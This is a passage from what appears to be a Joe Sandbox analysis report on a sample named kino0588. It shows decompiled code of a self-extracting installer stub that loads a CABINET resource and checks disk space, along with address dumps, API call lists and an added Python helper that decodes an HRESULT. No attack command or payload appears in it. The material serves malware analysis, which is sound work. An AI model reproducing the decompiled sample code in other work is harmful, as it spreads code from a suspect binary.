                                                                                                                                                                                                                                    													do {
                                                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                                                    														L43:
                                                                                                                                                                                                                                    														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                    														_push(4);
                                                                                                                                                                                                                                    														_t101 = 3;
                                                                                                                                                                                                                                    														_t82 =  &_v268;
                                                                                                                                                                                                                                    														_t44 = E0019597D(_t82, _t101, 1);
                                                                                                                                                                                                                                    														__eflags = _t44;
                                                                                                                                                                                                                                    													} while (_t44 != 0);
                                                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                    							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                                                    								_t72 = 1;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								__eflags =  *0x198b3f - _t35; // 0x0
                                                                                                                                                                                                                                    								_t72 = 0;
                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t101 = 0;
                                                                                                                                                                                                                                    							_t73 = E00195467(0x198b3e, 0, _t72);
                                                                                                                                                                                                                                    							__eflags = _t73;
                                                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                                                    								_t38 = 1;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t101 = 0x4be;
                                                                                                                                                                                                                                    								E001944B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t101 = 0x4b1;
                                                                                                                                                                                                                                    						E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                                                    						 *0x199124 = 0x80070714;
                                                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                                                    					E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					 *0x199124 = E00196285();
                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                                                    				return E00196CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                    			}
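The constant 0x80070714 written to *0x199124 in the error path above is a failure HRESULT with FACILITY_WIN32 (7) and Win32 code 0x714 = 1812, which winerror.h names ERROR_RESOURCE_DATA_NOT_FOUND. The following Python is an added example for triaging such literals when reading decompiler output; it is not part of the Joe Sandbox report or of the sample's code, and its SAMPLE_LISTING is constructed from three statements copied from the listing above.

```python
import re

# Added example (not part of the Joe Sandbox report or the sample's code):
# decode the HRESULT literal 0x80070714 that the decompiled function above
# stores to *0x199124, and scan decompiler output for similar constants.
#
# HRESULT layout: bit 31 = severity (1 = failure), bits 16..26 = facility,
# bits 0..15 = code. FACILITY_WIN32 is 7, so 0x8007xxxx is
# HRESULT_FROM_WIN32(xxxx): a plain Win32 error code wrapped as an HRESULT.

FACILITY_WIN32 = 7

# Subset of winerror.h: the code on the page and its neighbours in the
# resource-lookup family (names and values as defined in winerror.h).
WIN32_ERROR_NAMES = {
    0x714: "ERROR_RESOURCE_DATA_NOT_FOUND",  # 1812
    0x715: "ERROR_RESOURCE_TYPE_NOT_FOUND",  # 1813
    0x716: "ERROR_RESOURCE_NAME_NOT_FOUND",  # 1814
    0x717: "ERROR_RESOURCE_LANG_NOT_FOUND",  # 1815
}


def hresult_from_win32(win32_code: int) -> int:
    """Python mirror of the winerror.h macro HRESULT_FROM_WIN32()."""
    win32_code &= 0xFFFFFFFF
    if win32_code & 0x80000000:  # already a failure HRESULT: pass through
        return win32_code
    return 0x80000000 | (FACILITY_WIN32 << 16) | (win32_code & 0xFFFF)


def decode_hresult(value: int) -> dict:
    """Split an HRESULT into its fields; name the Win32 code when known."""
    value &= 0xFFFFFFFF
    facility = (value >> 16) & 0x7FF
    code = value & 0xFFFF
    is_win32 = facility == FACILITY_WIN32
    return {
        "failed": bool(value >> 31),
        "facility": facility,
        "win32_code": code if is_win32 else None,
        "name": WIN32_ERROR_NAMES.get(code) if is_win32 else None,
    }


# Any 32-bit literal with the severity bit set; the data addresses in the
# listing (0x199124, 0x198b3e, ...) do not start with 0x8 and are skipped.
_HRESULT_LITERAL = re.compile(r"\b0x8[0-9a-fA-F]{7}\b")


def find_hresults(decompiled: str) -> list:
    """Return (line_no, literal, decoded) for every HRESULT-looking literal."""
    hits = []
    for line_no, line in enumerate(decompiled.splitlines(), 1):
        for match in _HRESULT_LITERAL.finditer(line):
            literal = match.group(0)
            hits.append((line_no, literal, decode_hresult(int(literal, 16))))
    return hits


# Constructed sample: three statements copied from the listing above.
SAMPLE_LISTING = """\
*0x199124 = 0x80070714;
E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
*0x199124 = E00196285();
"""

if __name__ == "__main__":
    for line_no, literal, info in find_hresults(SAMPLE_LISTING):
        print(f"line {line_no}: {literal} -> {info}")
```

Running the block on the constructed listing reports exactly one hit, on its first line, decoded as a failed HRESULT in facility 7 carrying Win32 code 1812; the other two lines contain no 0x8xxxxxxx literal and produce nothing.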

                                                                                                                                                                                                                                    0x001955ab
                                                                                                                                                                                                                                    0x001955b2
                                                                                                                                                                                                                                    0x001955c9
                                                                                                                                                                                                                                    0x001955d5
                                                                                                                                                                                                                                    0x001955d9
                                                                                                                                                                                                                                    0x00195600
                                                                                                                                                                                                                                    0x00195605
                                                                                                                                                                                                                                    0x0019560a
                                                                                                                                                                                                                                    0x0019560c
                                                                                                                                                                                                                                    0x00195638
                                                                                                                                                                                                                                    0x00195641
                                                                                                                                                                                                                                    0x00195643
                                                                                                                                                                                                                                    0x00195645
                                                                                                                                                                                                                                    0x00195645
                                                                                                                                                                                                                                    0x0019564c
                                                                                                                                                                                                                                    0x00195652
Execution graph node addresses (column residue from the report's execution graph; leading whitespace stripped, values unchanged):
0x00195657
0x00195659
0x00195696
0x0019569c
0x0019589f
0x001958a7
0x001958ac
0x001958b3
0x001958b5
0x001956a2
0x001956a2
0x001956a8
0x00000000
0x001956ae
0x001956ae
0x001956b9
0x001956bf
0x001956c1
0x001956f3
0x001956f3
0x00195705
0x0019570a
0x00195711
0x00195717
0x00195724
0x00195726
0x00195729
0x00195730
0x00195737
0x0019573d
0x00195740
0x00000000
0x00000000
0x00000000
0x00000000
0x0019572b
0x0019572b
0x0019572e
0x00195742
0x00195742
0x00195745
0x0019576b
0x0019576b
0x00000000
0x00195747
0x00195747
0x0019574d
0x0019574f
0x00195771
0x00195771
0x00195773
0x00000000
0x00195751
0x00195751
0x00195753
0x00000000
0x00195755
0x0019575b
0x00195760
0x00195762
0x00000000
0x00195764
0x00195764
0x00195769
0x0019577e
0x0019577e
0x00195781
0x00195788
0x0019578d
0x0019578f
0x001957b2
0x001957b8
0x001957bd
0x001957bf
0x001957cd
0x001957cd
0x001957dd
0x001957e3
0x001957ef
0x001957f5
0x001957f8
0x0019580a
0x0019580a
0x001957fa
0x00195802
0x00195802
0x0019580d
0x0019580f
0x00195830
0x00195836
0x0019583d
0x0019584b
0x00195851
0x00195855
0x0019585a
0x0019585c
0x00000000
0x0019585e
0x0019585e
0x00000000
0x0019585e
0x00195811
0x00195817
0x00195819
0x0019581f
0x00000000
0x0019581f
0x00195791
0x00195797
0x0019579c
0x0019579e
0x00000000
0x001957a0
0x001957a9
0x001957ae
0x001957b0
0x00000000
0x00000000
0x00000000
0x00000000
0x001957b0
0x0019579e
0x00000000
0x00000000
0x00000000
0x00195769
0x00195762
0x00195753
0x0019574f
0x00000000
0x00000000
0x00000000
0x0019572e
0x00000000
0x00195864
0x00195864
0x00195864
0x00195717
0x00000000
0x001956c3
0x001956c5
0x001956c9
0x001956ce
0x001956d0
0x00000000
0x001956d6
0x001956d6
0x001956d8
0x001956dd
0x001956df
0x00000000
0x001956e1
                                                                                                                                                                                                                                    0x001956e2
                                                                                                                                                                                                                                    0x001956e4
                                                                                                                                                                                                                                    0x001956e6
                                                                                                                                                                                                                                    0x001956eb
                                                                                                                                                                                                                                    0x001956ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001956f3
                                                                                                                                                                                                                                    0x001956f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019586c
                                                                                                                                                                                                                                    0x00195878
                                                                                                                                                                                                                                    0x0019587e
                                                                                                                                                                                                                                    0x00195882
                                                                                                                                                                                                                                    0x00195883
                                                                                                                                                                                                                                    0x00195889
                                                                                                                                                                                                                                    0x0019588e
                                                                                                                                                                                                                                    0x0019588e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195896
                                                                                                                                                                                                                                    0x001956ed
                                                                                                                                                                                                                                    0x001956df
                                                                                                                                                                                                                                    0x001956d0
                                                                                                                                                                                                                                    0x001956c1
                                                                                                                                                                                                                                    0x001956a8
                                                                                                                                                                                                                                    0x0019565b
                                                                                                                                                                                                                                    0x0019565b
                                                                                                                                                                                                                                    0x0019565d
                                                                                                                                                                                                                                    0x00195669
                                                                                                                                                                                                                                    0x00195669
                                                                                                                                                                                                                                    0x0019565f
                                                                                                                                                                                                                                    0x0019565f
                                                                                                                                                                                                                                    0x00195665
                                                                                                                                                                                                                                    0x00195667
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195667
                                                                                                                                                                                                                                    0x0019566c
                                                                                                                                                                                                                                    0x00195673
                                                                                                                                                                                                                                    0x00195678
                                                                                                                                                                                                                                    0x0019567a
                                                                                                                                                                                                                                    0x0019589b
                                                                                                                                                                                                                                    0x0019589b
                                                                                                                                                                                                                                    0x00195680
                                                                                                                                                                                                                                    0x00195685
                                                                                                                                                                                                                                    0x0019568c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019568c
                                                                                                                                                                                                                                    0x0019567a
                                                                                                                                                                                                                                    0x0019560e
                                                                                                                                                                                                                                    0x00195613
                                                                                                                                                                                                                                    0x0019561a
                                                                                                                                                                                                                                    0x00195620
                                                                                                                                                                                                                                    0x00195626
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195626
                                                                                                                                                                                                                                    0x001955db
                                                                                                                                                                                                                                    0x001955e0
                                                                                                                                                                                                                                    0x001955e7
                                                                                                                                                                                                                                    0x001955f1
                                                                                                                                                                                                                                    0x001955f6
                                                                                                                                                                                                                                    0x001955f6
                                                                                                                                                                                                                                    0x001955f6
                                                                                                                                                                                                                                    0x001958b7
                                                                                                                                                                                                                                    0x001958c7

APIs
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
  • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
  • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
  • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
  • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
  • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001955CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00195638
• LocalFree.KERNEL32(00000000), ref: 0019564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00195620
  • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
  • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
  • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 001956B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0019571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00195737
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001957CD
• GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001957EF
• CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00195802
  • Part of subcall function 00192630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00192654
• SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00195830
  • Part of subcall function 00196517: FindResourceA.KERNEL32(00190000,000007D6,00000005), ref: 0019652A
  • Part of subcall function 00196517: LoadResource.KERNEL32(00190000,00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00196538
  • Part of subcall function 00196517: DialogBoxIndirectParamA.USER32(00190000,00000000,00000547,001919E0,00000000), ref: 00196557
  • Part of subcall function 00196517: FreeResource.KERNEL32(00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00196560
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00195878
  • Part of subcall function 0019597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001959A8
  • Part of subcall function 0019597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001959AF
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
• String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
• API String ID: 2436801531-752058184
• Opcode ID: d69c2889e7f3e43b98f3b81d93308ec766bf21489c1b48252856ffa3a6bd650c
• Instruction ID: 6c60e96828fc020201c5873c2a505fcafeaef186876948db4665b28799e534a0
• Opcode Fuzzy Hash: d69c2889e7f3e43b98f3b81d93308ec766bf21489c1b48252856ffa3a6bd650c
• Instruction Fuzzy Hash: A5814E70A04A05ABDF26AB759C45BFE766F9F60340F440066F986F3191EF708EC58B61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph of function 19597d; node and edge dump omitted)
C-Code - Quality: 96%
E0019597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
    signed int _v8;
    char _v16;
    char _v276;
    char _v788;
    long _v792;
    long _v796;
    long _v800;
    signed int _v804;
    long _v808;
    int _v812;
    long _v816;
    long _v820;
    void* __ebx;
    void* __esi;
    signed int _t46;
    int _t50;
    signed int _t55;
    void* _t66;
    int _t69;
    signed int _t73;
    signed short _t78;
    signed int _t87;
    signed int _t101;
    int _t102;
    unsigned int _t103;
    unsigned int _t105;
    signed int _t111;
    long _t112;
    signed int _t116;
    CHAR* _t118;
    signed int _t119;
    signed int _t120;

    _t114 = __edi;
    _t46 = *0x198004; // 0x21bd9a3c
    _v8 = _t46 ^ _t120;
    _v804 = __edx;
    _t118 = __ecx;
    GetCurrentDirectoryA(0x104, &_v276);
    _t50 = SetCurrentDirectoryA(_t118); // executed
    if(_t50 != 0) {
        _push(__edi);
        _v796 = 0;
        _v792 = 0;
        _v800 = 0;
        _v808 = 0;
        _t55 = GetDiskFreeSpaceA(0, &_v796, &_v792, &_v800, &_v808); // executed
        __eflags = _t55;
        if(_t55 == 0) {
            L29:
            memset(&_v788, 0, 0x200);
            *0x199124 = E00196285();
            FormatMessageA(0x1000, 0, GetLastError(), 0, &_v788, 0x200, 0);
            _t110 = 0x4b0;
            L30:
            __eflags = 0;
            E001944B9(0, _t110, _t118, &_v788, 0x10, 0);
            SetCurrentDirectoryA(&_v276);
            L31:
            _t66 = 0;
            __eflags = 0;
            L32:
            _pop(_t114);
            goto L33;
        }
        _t69 = _v792 * _v796;
        _v812 = _t69;
        _t116 = MulDiv(_t69, _v800, 0x400);
        __eflags = _t116;
        if(_t116 == 0) {
            goto L29;
        }
        _t73 = GetVolumeInformationA(0, 0, 0, 0, &_v820, &_v816, 0, 0); // executed
        __eflags = _t73;
        if(_t73 != 0) {
            SetCurrentDirectoryA(&_v276); // executed
            _t101 = &_v16;
            _t111 = 6;
            _t119 = _t118 - _t101;
            __eflags = _t119;
            while(1) {
                _t22 = _t111 - 4; // 0x2
                __eflags = _t22;
                if(_t22 == 0) {
                    break;
                }
                _t87 = *((intOrPtr*)(_t119 + _t101));
                __eflags = _t87;
                if(_t87 == 0) {
                    break;
                }
                *_t101 = _t87;
                _t101 = _t101 + 1;
                _t111 = _t111 - 1;
                __eflags = _t111;
                if(_t111 != 0) {
                    continue;
                }
                break;
            }
            __eflags = _t111;
            if(_t111 == 0) {
                _t101 = _t101 - 1;
                __eflags = _t101;
            }
            *_t101 = 0;
            _t112 = 0x200;
            _t102 = _v812;
            _t78 = 0;
            _t118 = 8;
            while(1) {
                __eflags = _t102 - _t112;
                if(_t102 == _t112) {
                    break;
                }
                _t112 = _t112 + _t112;
                _t78 = _t78 + 1;
                __eflags = _t78 - _t118;
                if(_t78 < _t118) {
                    continue;
                }
                break;
            }
                                                                                                                                                                                                                                    						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                    						if(_t78 != _t118) {
                                                                                                                                                                                                                                    							__eflags =  *0x199a34 & 0x00000008;
                                                                                                                                                                                                                                    							if(( *0x199a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                    								_t103 =  *0x199a38; // 0x0
                                                                                                                                                                                                                                    								_t110 =  *((intOrPtr*)(0x1989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                    								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                    									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                    									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                                                    									 *0x199124 = 0;
                                                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t66 = E0019268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t105 =  *0x199a38; // 0x0
                                                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0x1989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0x199a38;
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                                                    						E001944B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                    					 *0x199124 = E00196285();
                                                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                                                    					E001944B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					 *0x199124 = E00196285();
                                                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                                                    					return E00196CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00195af8
                                                                                                                                                                                                                                    0x00195af9
                                                                                                                                                                                                                                    0x00195af9
                                                                                                                                                                                                                                    0x00195afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195afd
                                                                                                                                                                                                                                    0x00195aff
                                                                                                                                                                                                                                    0x00195b00
                                                                                                                                                                                                                                    0x00195b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b03
                                                                                                                                                                                                                                    0x00195b05
                                                                                                                                                                                                                                    0x00195b08
                                                                                                                                                                                                                                    0x00195b20
                                                                                                                                                                                                                                    0x00195b27
                                                                                                                                                                                                                                    0x00195b52
                                                                                                                                                                                                                                    0x00195b52
                                                                                                                                                                                                                                    0x00195b5b
                                                                                                                                                                                                                                    0x00195b62
                                                                                                                                                                                                                                    0x00195b6b
                                                                                                                                                                                                                                    0x00195b6d
                                                                                                                                                                                                                                    0x00195b76
                                                                                                                                                                                                                                    0x00195b7d
                                                                                                                                                                                                                                    0x00195b83
                                                                                                                                                                                                                                    0x00195b7f
                                                                                                                                                                                                                                    0x00195b7f
                                                                                                                                                                                                                                    0x00195b7f
                                                                                                                                                                                                                                    0x00195b6f
                                                                                                                                                                                                                                    0x00195b72
                                                                                                                                                                                                                                    0x00195b72
                                                                                                                                                                                                                                    0x00195b85
                                                                                                                                                                                                                                    0x00195b98
                                                                                                                                                                                                                                    0x00195b9e
                                                                                                                                                                                                                                    0x00195b87
                                                                                                                                                                                                                                    0x00195b8f
                                                                                                                                                                                                                                    0x00195b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b85
                                                                                                                                                                                                                                    0x00195b29
                                                                                                                                                                                                                                    0x00195b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b35
                                                                                                                                                                                                                                    0x00195b48
                                                                                                                                                                                                                                    0x00195b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b4a
                                                                                                                                                                                                                                    0x00195b0f
                                                                                                                                                                                                                                    0x00195b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b16
                                                                                                                                                                                                                                    0x00195a7c
                                                                                                                                                                                                                                    0x00195a8a
                                                                                                                                                                                                                                    0x00195aa5
                                                                                                                                                                                                                                    0x00195aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001959bb
                                                                                                                                                                                                                                    0x001959c0
                                                                                                                                                                                                                                    0x001959c7
                                                                                                                                                                                                                                    0x001959d1
                                                                                                                                                                                                                                    0x001959d6
                                                                                                                                                                                                                                    0x00195c05
                                                                                                                                                                                                                                    0x00195c14
                                                                                                                                                                                                                                    0x00195c14

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001959A8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 001959AF
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00195A13
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00195A40
                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00195A64
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00195A7C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00195A98
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00195AA5
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00195BFC
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                      • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                                                    • Opcode ID: ed047529de121a1fa40647fc63aa5c9d80d3a9c424be046ebd36ce8b8e9e40bf
                                                                                                                                                                                                                                    • Instruction ID: 83e85fc950eafc819c10eba28444977973e6a519e8b4a7df1c7a3d48831a25ea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed047529de121a1fa40647fc63aa5c9d80d3a9c424be046ebd36ce8b8e9e40bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 227182B1900208AFEF169F64CC85FFA77BEEB48344F5441AAF506E7540DB309E858B65
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted; basic blocks of the function starting at 194fe0, marked Executed / Not Executed)
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E00194FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                    				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x199144 = E0019468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x199140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x198584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x198584, 0x841), 5); // executed
				}
				_t10 = E00194EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00194CA0, E00194CC0, E00194980, E00194A50, E00194AD0, E00194B60, E00194BC0, 1, 0x199148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x199148; // 0x0
						_t24 =  *0x198584; // 0x0
						E001944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x191140, 0, E00194CD0, 0, 0x199140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x198584; // 0x0
